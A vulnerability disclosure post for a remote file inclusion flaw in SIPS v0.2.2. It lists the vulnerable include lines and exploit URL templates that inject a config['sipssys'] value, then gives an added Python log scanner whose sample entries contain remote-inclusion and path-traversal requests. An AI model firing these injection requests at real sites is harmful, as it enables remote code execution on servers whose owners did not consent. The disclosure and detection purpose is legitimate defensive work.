SIPS v0.2.2 Remote File Inclusion Vulnerability

From: Cru3l.b0y <cru3l.b0y@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: SIPS v0.2.2 Remote File Inclusion Vulnerability
Date:

Attachments:
SIPS v0.2.2.txt

Hi Dear,
Please publish this bug.
Thank you

================================================================================

  [o] SIPS v0.2.2 Remote File Inclusion Vulnerability

      Software : SIPS v0.2.2
      Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip
      Author   : Cru3l.b0y
      Home     : WwW.DeltaHacking.Net

================================================================================

  [o] Vulnerable file

      search.php

          include $config["sipssys"] ."/code/news.inc.php";

      readmore.php

          include $config["sipssys"] ."/code/news.inc.php";

      index.php

          include $config["sipssys"] ."/code/news.inc.php";
          include $config["sipssys"] ."/code/box.inc.php";

      search/submit.php

          include $config["sipssys"] ."/code/search.inc.php";

================================================================================

  [o] Exploit

      http://localhost/[path]/search.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/index.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]

================================================================================
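
One way to find requests of the shape listed in the advisory in a web server access log, added here as an example and not part of the original post. It assumes a combined-format log and that `config` is never a legitimate request parameter for these scripts; the log lines, the `/sips/` path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts the advisory lists as including from $config["sipssys"].
AFFECTED = ("/search.php", "/readmore.php", "/index.php", "/search/submit.php")

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def config_override(line):
    """Return (client, path, key, remote) when a request sets config[...] on an
    affected script, else None. 'remote' is True when the value carries a URL scheme."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # A bare directory request is assumed to be served by index.php.
    if not (url.path.endswith(AFFECTED) or url.path.endswith("/")):
        return None
    # parse_qsl percent-decodes names and values, so config%5Bsipssys%5D is caught too.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "config" or key.startswith("config["):
            return line.split()[0], url.path, key, "://" in value
    return None

def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(config_override, lines) if hit]

# Constructed sample log lines (documentation address ranges, example.test host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sips/index.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /sips/search.php'
    '?config[sipssys]=http://files.example.test/a HTTP/1.1" 200 312',
    '198.51.100.3 - - [01/Jan/2024:10:00:09 +0000] "GET /sips/search/submit.php'
    '?config%5B%22sipssys%22%5D=..%2F..%2Ftmp HTTP/1.1" 200 298',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /other/page.php'
    '?config[sipssys]=x HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for client, path, key, remote in scan(SAMPLE_LOG):
        print(f"{client} set {key} on {path} (remote value: {remote})")
```

Access logs record only the query string, so a value supplied in a request body or cookie would not appear here.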



